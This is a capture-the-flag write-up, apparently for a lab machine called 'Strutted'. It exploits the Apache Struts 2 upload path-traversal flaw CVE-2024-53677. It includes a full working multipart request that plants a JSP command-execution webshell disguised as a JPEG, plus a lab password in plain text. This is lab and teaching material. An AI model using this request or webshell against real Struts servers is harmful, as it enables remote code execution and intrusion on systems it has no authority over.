Syk0

Strutted

Strutted

Overview

Strutted runs an Apache Struts 2 application vulnerable to CVE-2024-53677 - a file upload parameter tampering vulnerability that allows path traversal during upload, writing a JSP webshell outside the intended directory. A password is found in the application, and the james OS user is identified. Privilege escalation notes are minimal beyond the initial shell.

Recon

Nmap

Ports 22 and 80 open.

Web Enumeration

The application homepage offers a sample download:

The upload feature uses Apache Struts 2 (/upload.action endpoint) - confirmed by the .action suffix and framework behaviour.

Foothold

CVE-2024-53677 - Struts File Upload Path Traversal

Apache Struts 2 has a long history of critical file upload vulnerabilities. CVE-2024-53677 allows overriding the upload filename via the top.UploadFileName parameter, enabling path traversal to write files outside the intended upload directory.

Reference PoC: https://github.com/Cythonic1/CVE-2024-53677-POC/blob/master/main.go

Craft a multipart upload request that writes a JSP webshell to the webroot:

POST /upload.action HTTP/1.1
Host: strutted.htb
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3RSZ9PS7AmdU5qmw
 
------WebKitFormBoundary3RSZ9PS7AmdU5qmw
Content-Disposition: form-data; name="Upload"; filename="6qC7Ole6.jpg"
Content-Type: image/jpeg
 
ÿØÿà
<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = in.readLine()) != null) {
            out.println(line);
        }
    }
%>
------WebKitFormBoundary3RSZ9PS7AmdU5qmw
Content-Disposition: form-data; name="top.UploadFileName"
 
../../shell.jsp
------WebKitFormBoundary3RSZ9PS7AmdU5qmw--

Key points:

  • The upload filename is a decoy image name - the actual destination is controlled by top.UploadFileName
  • ../../shell.jsp traverses up from the upload directory to the webroot
  • The JSP content is embedded in what appears to be a JPEG (JPEG magic bytes at the start to pass MIME checks)

The webshell is now accessible at http://strutted.htb/shell.jsp?cmd=id.

Credential Discovery

Enumerate the application - find an admin password in config or application files:

IT14d6SSP81k

The james user exists in /etc/passwd:

Test the found password for SSH or su as james.

Privilege Escalation

Enumerate sudo rights and SUID binaries for the escalation path from the initial webshell / james shell.

Attack Chain Summary

PhaseTechniqueResult
ReconWeb enumerationStruts 2 upload action
FootholdCVE-2024-53677 path traversalJSP webshell in webroot
Credential discoveryApplication enumerationIT14d6SSP81k + james user
Privesc(sudo/SUID enumeration)Root access